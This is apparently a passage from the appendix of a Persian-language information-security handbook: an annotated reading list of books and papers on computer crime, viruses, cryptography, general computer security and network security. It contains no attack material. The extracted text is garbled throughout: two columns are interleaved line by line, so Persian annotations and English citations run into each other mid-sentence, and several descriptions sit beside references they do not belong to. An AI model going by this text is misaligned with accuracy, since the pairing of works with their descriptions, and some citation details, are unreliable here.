‫ﭼﺎﭖ ﻣﺠﺪﺩ ﻣﻘﺎﻻﺕ ﺳﻨﺘﻲ‪ ،‬ﻛﻪ ﺑﻴﺸﺘﺮ ﺑـﻪ ﺩﻻﻳـﻞ ﺗـﺎﺭﻳﺨﻲ ﺩﺭ‬ ‫ﻣﺠﻤﻮﻋﻪ ﺩﺍﺳـﺘﺎﻧﻬﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺗﺤﻘﻴﻘـﺎﺕ‬
‫ﺍﻳﻨﺠﺎ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪:‬‬ ‫ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬـﺎ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ ﺑـﺮﺍﻱ ﺭﻭﺷـﻦ ﺷـﺪﻥ ﺍﺑﻌـﺎﺩ ﻣـﺴﺌﻪ‪،‬‬
‫ﺁﻣﺎﺭﻫﺎﻳﻲ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪Denning, Peter J. Computers Under Attack:‬‬
‫‪Intruders, Worms and Viruses. Reading, MA:‬‬ ‫‪Power, Richard. Tangled Web. Indianapolis,‬‬
‫‪ACM Press/Addison-Wesley, 1990.‬‬ ‫‪IN, Que, 2002.‬‬

‫ﻣﺠﻤﻮﻋﺔ ﺟـﺎﻣﻌﻲ ﺍﺯ ﻣﻄﺎﻟـﺐ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻭﻳﺮﻭﺳـﻬﺎ‪ ،‬ﻛﺮﻣﻬـﺎ ﻭ‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﻣﻮﺍﺭﺩﻱ ﺍﺯﺍﻳﻦ ﻗﺒﻴﻞ‪ ،‬ﻛﻪ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺩﻻﻳـﻞ ﺗـﺎﺭﻳﺨﻲ ﺩﺭ ﺍﻳﻨﺠـﺎ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺑﺮ ﮔﻴﺮﻧﺪﺓ ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺳﻴﺴﺘﻤﻬﺎﻱ‬
‫ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪:‬‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ‪ ،‬ﻭ ﺭﻭﺷﻬﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑـﺎ‬
‫‪Hoffman, Lance J., Rogue Programs:‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺗﻮﻟﻴـﺪ ﻛـﺮﺩ ﻛـﻪ ﺗﺤﻤـﻞ‬
‫‪Viruses, Worms and Trojan Horses. New‬‬ ‫ﺧﻄﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷﺘﻪ ﻭ ﺍﺯ ﺍﺳﺘﺤﻜﺎﻡ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪:‬‬
‫‪York, NY: Van Nostrand Reinhold, 1990.‬‬
‫‪Leveson, Nancy G. Safeware: System‬‬
‫ﻳﻚ ﻧﺸﺮﻳﺔ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ‬ ‫‪Safety and Computers. A Guide to‬‬
‫ﺣﺬﻑ ﺁﻧﻬﺎ‪ ،‬ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﻌﺘﺒﺮ ﺍﺳﺖ‪ ،‬ﻭ ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﺑﻴـﺸﺘﺮ ﺑـﻪ‬ ‫‪Preventing Accidents and Losses Caused‬‬
‫‪by Technology. Reading, MA: Addison‬‬
‫ﺩﺭﺩ ﺍﺩﺍﺭﺍﺗﻲ ﻣﻲﺧﻮﺭﺩ ﻛﻪ ﺗﻌﺪﺍﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬ ‫‪Wesley, 1995.‬‬
‫ﻧﺸﺮﻳﻪ ﻫﻤﭽﻨﻴﻦ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎﻳﻲ ﺑﺮﮔـﺰﺍﺭ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻥ ﻣﻘﺎﻻﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺩﺭ ﻣﻮﺭﺩ ﻭﻳﺮﻭﺳﻬﺎ ﭘﻴﺪﺍ ﻛﺮﺩ‪:‬‬ ‫ﻛﺘﺎﺏ ﺯﻳﺮ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻣﻬﻤﺘـﺮﻳﻦ ﺭﺧـﺪﺍﺩﻫﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ‬
‫ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺑﻮﻗـﻮﻉ ﭘﻴﻮﺳـﺘﻪﺍﻧـﺪ‪.‬‬
‫‪The Virus Bulletin. Virus Bulletin CTD. Oxon,‬‬ ‫ﻧﻮﻳـﺴﻨﺪﺓ ﺍﻳـﻦ ﻛﺘـﺎﺏ )ﺩﻛﺘــﺮ ﻧﻴـﻮﻣﻦ( ﺳـﺮﺩﺑﻴﺮ ﻓﻬﺮﺳـﺖ ﭘــﺴﺘﻲ‬
‫)‪England. (http://www.virusbtn.com‬‬
‫"ﻣﺨﺎﻃﺮﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ" ﺍﺳﺖ‪.‬‬

‫‪Neumann, Peter G. Computer Related‬‬


‫‪Risks. Reading, MA: Addison & Wesley,‬‬
‫‪1995.‬‬
٤٩٧ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﻳــﻚ ﻛﺘــﺎﺏ ﺑــﺴﻴﺎﺭ ﺧﻮﺍﻧــﺪﻧﻲ ﻭ ﺑــﻪﺭﻭﺯ ﺍﺯ ﺗﺎﺭﻳﺨﭽــﻪ ﻭ ﺍﺻــﻮﻝ‬ ‫ﻛﺘﺎﺑﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ‬


:‫ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﻛﺘﺎﺏ ﺳﻨﺘﻲ ﺍﻳﻦ ﺣﻮﺯﻩ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺁﻥ ﺩﺭ ﺑﺎﺯﺍﺭ‬
Singh, Simon. The Code Book: The Science :‫ ﻭﻟﻲ ﺣﺎﻭﻱ ﻣﻄﺎﻟﺐ ﭘﺮ ﺍﺭﺯﺷﻲ ﺍﺳﺖ‬،‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‬
of Secrecy from Ancient Egypt to Quantum
Cryptography. NY: Anchor Books, 2000.
Denning, Dorothy E. R. Cryptography and
Data Security. Reading, MA: Addison-
Wayner, Peter. Disappearing Cryptography; Wesley, 1983.
Boston, MA: Academic Press, 1996.
‫ ﻭ‬،PGP ‫ ﺗﺎﺭﻳﺨﭽـﺔ ﺑﺮﻧﺎﻣـﺔ‬،‫ﻛﺘﺎﺑﻲ ﻛﻪ ﺗﺎﺭﻳﺨﭽـﺔ ﺭﻣﺰﻧﮕـﺎﺭﻱ‬
‫ﻣﻘﺎﻻﺕ ﻭ ﺳﺎﻳﺮ ﻧﺸﺮﻳﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﻣﺰﻧﮕﺎﺭﻱ‬ :‫ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‬
‫ ﺩﺭ ﻣﻮﺭﺩ ﻛﻤﻴﺘﺔ‬ACM ‫ﮔﺰﺍﺭﺵ ﻳﻚ ﻣﻴﺰﮔﺮﺩ ﺍﺧﺘﺼﺎﺻﻲ‬ Garfinkel, Simson. PGP: Pretty Good
:‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻋﻤﻮﻣﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬ Privacy. Sebastopol, CA: O’Reilly &
Associates, 1994.
Association for Computing Machinery (ACM).
“Codes, Keys, and Conflicts: Issues in U.S. Hinsley, F.H., and Alan Stripp. Code
Crypto Policy.” USACM, June 1994. Breakers: The Inside Story of Bletchley
(http://info.acm.org/reports/acm_crypto_study. html) Park. Oxford, England: Oxford University
Press, 1993.
:‫ﺗﺎﺭﻳﺨﭽﺔ ﻣﺸﺮﻭﺡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﻪ ﺯﺑﺎﻥ ﻧﻮﻳﺴﻨﺪﻩ‬
‫ﻣﺠﻤﻮﻋــﺔ ﺟــﺎﻟﺒﻲ ﺍﺯ ﻣﻄﺎﻟــﺐ ﻭ ﻣﻘــﺎﻻﺕ ﺩﺭ ﻣــﻮﺭﺩ ﺗﺮﺍﺷــﺔ‬
Diffie, Whitfield. “The First Ten Years of ‫ ﻭ ﺳﻴﺎﺳﺖ‬،‫ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬،Clipper
Public-Key Cryptography.” Proceedings of
the IEEE 76 (1988): 560–76. ‫ ﻛـﻪ ﺍﺯ ﻣﺮﺍﺟـﻊ ﺳـﻨﺘﻲ ﺑـﻪ ﺷـﻤﺎﺭ‬،‫ﻋﻤﻮﻣﻲ ﺩﺭ ﻗﺒﺎﻝ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
:‫ﻣﻲﺭﻭﺩ‬
:‫ﻣﻘﺎﻟﻪﺍﻱ ﻛﻪ ﻣﻔﻬﻮﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻣﻌﺮﻓﻲ ﻛﺮﺩ‬
Hoffman, Lance J. Building in Big Brother:
Diffie, Whitfield, and M.E. Hellman. “New The Cryptographic Policy Debate. New York,
Directions in Cryptography.” IEEE NY: Springer-Verlag, 1995.
Transactions on Information Theory IT-22
(1976). ‫ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ‬،‫ﻛﺘﺎﺑﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﻣﻌﺮﻑ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﻮﺩ‬
:‫ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‬IDEA ‫ﻣﻘﺎﻟﻪﺍﻱ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰ‬ :‫ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺧﺘﺮﺍﻉ ﺷﻮﺩ‬

Kahn, David. The Codebreakers. New York,


Lai, Xuejia. “On the Design and Security of
Block Ciphers.” ETH Series in Information NY: Macmillan Company, 1972.
Processing 1 (1992).
‫ﺟﺎﻣﻊﺗﺮﻳﻦ ﻛﺘﺎﺏ ﻏﻴﺮ ﻣﺤﺮﻣﺎﻧﻪ ﺩﺭ ﻣﻮﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬
LaMacchia, Brian A. and Andrew M.
Odlyzko. “Computation of Discrete ‫ﺭﻭﺷﻬﺎﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻛـﻪ ﺗـﺎﻛﻨﻮﻥ ﺑـﻪ ﭼـﺎﭖ ﺭﺳـﻴﺪﻩ‬
Logarithms in Prime Fields.” Designs,
‫ﺑﺨﺶ ﺷﺸﻢ‬

:‫ﺍﺳﺖ‬
Codes, and Cryptography. (1991):, 46–62.
Schneier, Bruce. Applied Cryptography:
Lenstra, A.K., H. W. Lenstra, Jr., M.S. Protocols, Algorithms, and Source Code in
Manasse, and J.M. Pollard. “The Number C. Second edition. New York, NY: John
Field Sieve.” Proceedings of the 22nd ACM Wiley & Sons, 1996.
Symposium on the Theory of Computing.
Baltimore MD: ACM Press, 1990, 564–72.
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٤٩٨

‫ ﻗﻴﻤﺖ‬.‫ﺍﻳﻦ ﻧﺸﺮﻳﻪ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻣﻄﺒﻮﻋﺎﺕ ﺍﻳﻦ ﺣﻮﺯﻩ ﺍﺳﺖ‬ :‫ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﻣﻔﻬﻮﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻛﺮﺩﻩ ﺍﺳﺖ‬
‫ﺍﻳﻦ ﻧﺸﺮﻳﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺍﺷـﺘﺮﺍﻙ ﻣﺆﺳـﺴﺎﺕ‬
Merkle, Ralph. “Secure Communication over
‫ ﻫﺮ ﺷﻤﺎﺭﺓ ﺍﻳﻦ ﻧـﺸﺮﻳﻪ ﺑـﻪ ﺩﻫﻬـﺎ‬.‫ﻣﻨﺎﺳﺐ ﺍﺳﺖ ﺗﺎ ﺍﻓﺮﺍﺩ ﺣﻘﻴﻘﻲ‬ Insecure Channels.” Communications of the
‫ﻧﺸﺮﻳﻪ ﻭ ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕﺮ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﻬـﺎ ﻣﻄﺎﻟـﺐ ﻗﺎﺑـﻞ‬ ACM 21 (1978): 294–99 (submitted in 1975).
.‫ ﻣﺮﺍﺟﻊ ﻭ ﻣﻜﺎﺗﺒـﺎﺕ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﺩ‬،‫ﺗﻮﺟﻪ ﻳﺎﻓﺖ ﺷﻮﺩ ﻭ ﻧﻴﺰ ﻣﻘﺎﻻﺕ‬
Merkle, Ralph, and Martin E. Hellman. “On
‫ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺻﻔﺤﺎﺕ ﻭﺏ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻗﺴﻤﺖ ﮔﺎﻫﻨﺎﻣـﻪﻫـﺎﻱ‬ the Security of Multiple Encryption.”
.‫ﺍﻣﻨﻴﺘﻲ )ﺍﻧﺘﻬﺎﻱ ﻫﻤﻴﻦ ﭘﻴﻮﺳﺖ( ﺁﻣﺪﻩ ﺍﺳﺖ‬ Communications of the ACM 24 (1981):
465–67.
‫ ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻨـﻮﺯ‬.‫ﻳﻚ ﻣﻘﺪﻣﺔ ﻗﻮﻱ ﺍﺯ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ‬
Merkle, Ralph, and Martin E. Hellman.
‫ﻫﻢ ﺑﻴﺸﺘﺮ ﺍﺻـﻮﻝ ﮔﻔﺘـﻪﺷـﺪﻩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ “Hiding Information and Signatures in Trap
:‫ﭘﻴﺸﺮﻓﺘﻪ ﻧﻴﺰ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ‬ Door Knapsacks.” IEEE Transactions on
Information Theory 24 (1978): 525–30.
Gasser, Morrie. Building a Secure Computer
Rivest, Ron, A. Shamir, and L. Adleman. “A
System. New York, NY: Van Nostrand
Method for Obtaining Digital Signatures and
Reinhold, 1988.
Public Key Cryptosystems.”
Communications of the ACM 21 (1978).
‫ﻳــﻚ ﻛﺘــﺎﺏ ﻭ ﻣﺮﺟــﻊ ﺗﺤﻘﻴﻘــﺎﺗﻲ ﺧــﻮﺏ ﻛــﻪ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ‬
:‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻣﻲﺷﻮﺩ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻋﺎﻡ‬

Gollmann, Dieter. Computer Security; ‫ﻳﻚ ﻣﻘﺪﻣﺔ ﻛﺎﻣﻞ ﻭ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺳﻄﺢ ﻣﺘـﻮﻥ‬
Chichester, UK, John Wiley & Sons, 1999.
:‫ﺩﺍﻧﺸﮕﺎﻫﻲ‬
‫ﻣﺠﻤﻮﻋﺔ ﺑﺰﺭﮒ ﻭ ﺟﺎﻣﻌﻲ ﺍﺯ ﻣﻘﺎﻻﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﺔ ﺟﻨﺒﻪﻫـﺎﻱ‬ Amoroso, Edward. Fundamentals of
:‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ Computer Security Technology. Englewood
Cliffs, NJ: Prentice-Hall, 1994.
Hunt, A. E., S. Bosworth, and D. B. Hoyt,
eds. Computer Security Handbook, 3rd ‫ ﺑـﺎ‬،‫ﻛﺘﺎﺏ ﺟﺎﻣﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻧﺘﻬـﺎ ﺑـﻪ ﺍﻧﺘﻬـﺎ‬
edition. New York, NY: Wiley, 1995.
:‫ﻣﺪﻧﻈﺮ ﺩﺍﺷﺘﻦ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‬
:‫ﻳﻚ ﻣﻘﺪﻣﺔ ﺧﻮﺏ ﺩﻳﮕﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ Anderson, Ross. Security Engineering; NYC,
NY: John Wiley & Sons, 2001.
Pfleeger, Charles P and Shari Lawrence
Pfleeger. Security in Computing. Englewood
Cliffs, NJ: Prentice-Hall, 3rd edition, 2002. ‫ﻳﻚ ﻛﺘﺎﺏ ﺑﺴﻴﺎﺭ ﺧـﻮﺏ ﺩﺭ ﺗﺎﺭﻳﺨﭽـﻪ ﻭ ﺳـﺎﺧﺘﺎﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
:‫ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑﺮﺍﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‬
‫ ﻭ‬،‫ﻳﻚ ﻣﻘﺪﻣﺔ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
:‫ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺍﻟﺰﺍﻣﺎﺕ ﻭ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﻭﻟﺖ‬ Bace, Rebecca. Intrusion Detection;
Indianapolis, IN: Macmillan, 2000.
Russell, Deborah, and G. T. Gangemi, Sr.
Computer Security Basics. Sebastopol, CA: ‫ ﺩﺭ‬Elsevier ‫ ﺑﺎﺭ ﺩﺭ ﺳـﺎﻝ ﺗﻮﺳـﻂ ﺍﻧﺘـﺸﺎﺭﺍﺕ‬۸ ‫ﻧﺸﺮﻳﻪﺍﻱ ﻛﻪ‬
O’Reilly & Associates, 1991. ‫ﺁﻛﺴﻔﻮﺭﺩ ﺍﻧﮕﻠﺴﺘﺎﻥ ﺑﻪ ﭼﺎﭖ ﻣﻲﺭﺳﺪ )ﺑﺮﺍﻱ ﺳﻔﺎﺭﺵ ﻛﺘﺎﺏ ﺑﺎ ﺷـﻤﺎﺭﺓ‬
:(‫ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‬+44 (0) 865-512242
Schneier, B. Secrets and Lies: Digital Computers & Security
Security in a Networked World. New York:
John Wiley & Sons, 2000.
٤٩٩ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﻳﻚ ﻣﺮﺟﻊ ﻛﺎﻣـﻞ ﻭ ﺟـﺬﺍﺏ ﻛـﻪ ﺑـﻪ ﺗـﺸﺮﻳﺢ ﻧﺤـﻮﺓ ﻋﻤﻠﻜـﺮﺩ‬ ‫ﻣﻄﺎﻟﻌﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺪﻧﺒﺎﻝ ﺩﺭﻙ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ‬
،‫ ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﭘﺮﻭﺗﻜﻠﻬـﺎ‬- TCP/IP ‫ﺷﺒﻜﻪ ﻫﺎﻱ‬ :‫ﺍﻣﻨﻴﺖ ﻭ ﺍﻋﺘﻤﺎﺩ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ ﻳﻚ ﺿﺮﻭﺭﺕ ﺍﺳﺖ‬
:‫ ﻣﻲﭘﺮﺩﺍﺯﺩ‬- ‫ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬،tuning
Thompson, Ken. “Reflections on Trusting
Trust” Communications of the ACM, Volume
Comer, Douglas E. Internetworking with
27, Number 8, August (1984).
TCP/IP, 3rd Edition. Englewood Cliffs, NJ:
Prentice Hall, 4th edition, 2000.
‫ ﻭ ﻣـﺸﻜﻼﺕ‬،‫ﻳﻚ ﻛﺘﺎﺏ ﻋﺎﻟﻲ ﺩﺭ ﻣﻮﺭﺩ ﺗﻮﻟﻴﺪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻳﻤـﻦ‬
Garfinkel, Simson. Web Security, Privacy, :‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺑﻲﺿﺎﺑﻄﻪ‬
and Commerce, 2nd Edition. Cambridge,
MA: O’Reilly and Associates, Inc. 2002.
Viega, John and Gary McGraw. Building
Secure Software; Indianapolis, IN: Pearson/
Windows 2000 ‫ ﺭﺍ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ‬kerberos ‫ﻛﺘﺎﺑﻲ ﻛﻪ‬ Addison-Wesley, 2002.
:‫ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺗﺸﺮﻳﺢ ﻛﺮﺩﻩ ﺍﺳﺖ‬Unix ‫ﻭ‬
‫ﻛﺘﺎﺑﻲ ﺷﺎﻣﻞ ﻳﻚ ﻓﻬﺮﺳﺖ ﺟﺎﻣﻊ ﻭ ﺟﺰﺋﻲ ﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩ ﻭﺿﻌﻴﺖ‬
Garman, Jason. Kerberos – The Definitive :‫ﺍﻳﻤﻨﻲ ﺭﺍﻳﺎﻧﻪ ﻭ ﻋﻤﻠﻴﺎﺕ‬
Guide. Cambridge, MA: O’Reilly and
Associates, Inc, 2003.
Wood, Charles Cresson, et al. Computer
Security: A Comprehensive Controls
‫ )ﻭ ﺑـﺎ ﺗﻤﺮﻛـﺰ‬TCP/IP ‫ﻛﺘﺎﺑﻲ ﻛﻪ ﻣﺮﻭﺭﻱ ﻋﺎﻟﻲ ﺑﺮ ﺷﺒﻜﻪ ﺳﺎﺯﻱ‬ Checklist, New York, NY: John Wiley &
‫( ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﻭ ﻳﻚ ﻣﺮﺟﻊ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺑﺮﺍﻱ‬Unix ‫ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ‬ Sons, 1987.
‫ ﻣﺎﻧﻨـﺪ‬- Unix ‫ﺑﺮﭘﺎﻳﻲ ﺧﺪﻣﺎﺕ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﺻﻠﻲ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ ﺍﻣـﺎ ﺍﮔـﺮ ﺑﺘﻮﺍﻧﻴـﺪ‬،‫ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻫﻢ ﺍﻛﻨﻮﻥ ﺩﺭ ﺑﺎﺯﺍﺭ ﻧﻴـﺴﺖ‬
:‫ ﻣﻲﺑﺎﺷﺪ‬- sendmail ‫ ﻭ‬Bind
‫ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳـﻚ ﻣﺮﺟـﻊ ﺑـﺴﻴﺎﺭ‬،‫ﻳﻚ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ‬
Hunt, Craig. TCP/IP Network .‫ﺑﺎﺍﺭﺯﺵ ﺑﺮﺍﻳﺘﺎﻥ ﺗﺒﺪﻳﻞ ﺷﻮﺩ‬
Administration.Sebastopol, CA: O'Reilly &
Associates, 3rd edition, 2002. ‫ﻓﻨﺎﻭﺭﻱ ﻭ ﺍﻳﻤﻨﻲ ﺷﺒﻜﻪ‬
Kaufman, Charles, Radia Perlman, and Mike
Speciner. Network Security: Private ‫ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻘﺮﻳﺒـﹰﺎ‬.‫ﺩﻭﻣﻴﻦ ﻭﻳﺮﺍﻳﺶ ﺍﺯ ﻣﺮﺟﻊ ﺳﻨﺘﻲ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
Communications in a Public World. ‫ﻫﻤﺔ ﻧﻜﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺭﺍ ﺑﻪ ﺷـﻤﺎ‬
Englewood Cliffs, NJ: Prentice-Hall, 2nd
edition, 2002.
‫ ﻣﺘﻦ ﺍﻭﻟﻴﺔ ﻛﺘﺎﺏ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩ ﻭ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ‬.‫ﻣﻲﺁﻣﻮﺯﺩ‬
‫ ﻗﺎﺑـــﻞ ﺩﺳﺘﺮﺳـــﻲ‬http://www.wilyhacker.com/1e/
:‫ﻳﻚ ﻛﺘﺎﺏ ﻣﻘﺪﻣﺎﺗﻲ ﻣﻨﺎﺳﺐ‬ :‫ﺍﺳﺖ‬

Stallings, William. Cryptography and Cheswick, Bill, Steve Bellovin, and Aviel
Network Security: Principles and Practices. Rubin. Firewalls and Internet Security:
Englewood Cliffs, NJ: PrenticeHall, 2003. Repelling the Wily Hacker, 2nd Edition.
Reading, MA: Addison-Wesley, 2003.
‫ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﺪﻣﺎﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺍﻣﻨﻴﺘﻲ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

